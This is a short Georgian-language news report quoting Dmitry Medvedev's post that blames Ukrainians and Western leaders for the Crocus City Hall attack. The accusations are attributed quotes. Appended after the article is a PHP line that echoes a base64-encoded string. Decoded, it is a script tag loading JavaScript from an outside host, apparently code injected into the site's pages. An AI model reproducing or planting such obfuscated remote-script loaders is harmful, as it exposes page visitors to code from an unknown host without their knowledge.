celsiusi
ავერსი საქკაბელი

 რუსეთის უშიშროების საბჭოს თავმჯდომარის მოადგილე დიმიტრი მედვედევი საფრანგეთის, გაერთიანებული სამეფოსა და გერმანიის ლიდერებს „კროკუს სითი ჰოლზე“ განხორციელებული ტერაქტის თანამონაწილეებს, უკრაინელებს კი მის ნამდვილ დამკვეთებს უწოდებს.

„პატივცემულო აშშ-ის და ევროპის ქვეყნების ლიდერებო! ტერორისტების განცხადებები, რომ მათ კიევში მილიონ რუბლს დაჰპირდნენ და რომ იქ მისასვლელად რუსეთ-უკრაინის საზღვარზე ფანჯარა უნდა გაველოთ, თქვენთვის საკმარისი არ იყო?ტერაქტი ISIS-მა დაუკვეთა, ასე არ არის? ნამდვილი დამკვეთები არიან უკრაინელი ბანდერ ნაძირალები, თქვენი აღზრდილები და ამ მკვლელობის თანამზრახველები ხართ თქვენ : ბაიდენი, მაკრონი, სუნაკიშოლცი და სხვა თანამზრახველები. ჩვენ ამას არ დავივიწყებთ!“ - წერს მედვედევი X-ზე.

ცნობისთვის, მანამდე, რუსულ მედიაში გავრცელდა „კრუკუს სითი ჰოლზე“ 22 მარტს განხორციელებულ თავდასხმაში ბრალდებულთა დაკითხვის კადრები. მათ კოორდინატორად დაასახელეს ვინმე საიფულო, რომელმაც მიუთითა თავდასხმის ადგილი, უკრაინის საზღვრამდე გაქცევის გზა და ფულად ჯილდოს დაჰპირდა.

167
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");